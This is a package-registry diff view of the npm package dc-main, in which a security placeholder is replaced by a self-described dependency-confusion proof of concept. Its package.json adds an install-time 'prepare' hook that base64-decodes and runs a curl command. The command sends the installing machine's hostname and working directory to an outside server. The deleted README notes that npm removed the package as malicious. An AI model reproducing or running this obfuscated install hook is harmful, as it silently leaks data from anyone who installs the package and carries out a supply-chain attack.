npm - dc-main - Versions diffs - 0.0.1-security → 1.0.0 - Mend

dc-main 0.0.1-security → 1.0.0

This version of dc-main might be problematic. Click here for more details.

Files changed (3) hide show

package/index.js ADDED Viewed

@@ -0,0 +1,21 @@
+const str = function () {
+/*
+    ______                          _                         _____              __           _              ______ _____ _____
+    |  _  \                        | |                       /  __ \            / _|         (_)             | ___ \  _  /  __ \
+    | | | |___ _ __   ___ _ __   __| | ___ _ __   ___ _   _  | /  \/ ___  _ __ | |_ _   _ ___ _  ___  _ __   | |_/ / | | | /  \/
+    | | | / _ \ '_ \ / _ \ '_ \ / _` |/ _ \ '_ \ / __| | | | | |    / _ \| '_ \|  _| | | / __| |/ _ \| '_ \  |  __/| | | | |
+    | |/ /  __/ |_) |  __/ | | | (_| |  __/ | | | (__| |_| | | \__/\ (_) | | | | | | |_| \__ \ | (_) | | | | | |   \ \_/ / \__/\
+    |___/ \___| .__/ \___|_| |_|\__,_|\___|_| |_|\___|\__, |  \____/\___/|_| |_|_|  \__,_|___/_|\___/|_| |_| \_|    \___/ \____/
+              | |                                      __/ |
+              |_|                                     |___/
+    A poc of dependency confusion. This is for proof of concept only.
+    Contact: contact@jqsec.cc
+*/
+}
+console.log(str.toString().split('\n').slice(2,-2).join('\n'))

package/package.json CHANGED Viewed

@@ -1,6 +1,11 @@
 {
-  "name": "dc-main",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+    "name": "dc-main",
+    "version": "1.0.0",
+    "description": "",
+    "main": "index.js",
+    "scripts": {
+      "prepare":"echo 'Y3VybCBodHRwczovL2RjLjcwLmxjL2QgLVggUE9TVCAtSCAnQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9qc29uJyAtLWRhdGEgJ3siaXAiOiJOL0EiLCJob3N0IjoiJyQoaG9zdG5hbWUpJyIsInBhdGgiOiInJChwd2QpJyIsIm9yZyI6Ik4vQSIsInBhY2thZ2UiOiJOL0EiLCJ2ZXJzaW9uIjoiTi9BIn0n' | base64 -d | sh"
+    },
+    "author": "jq",
+    "license": "ISC"
+  }

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=dc-main for more information.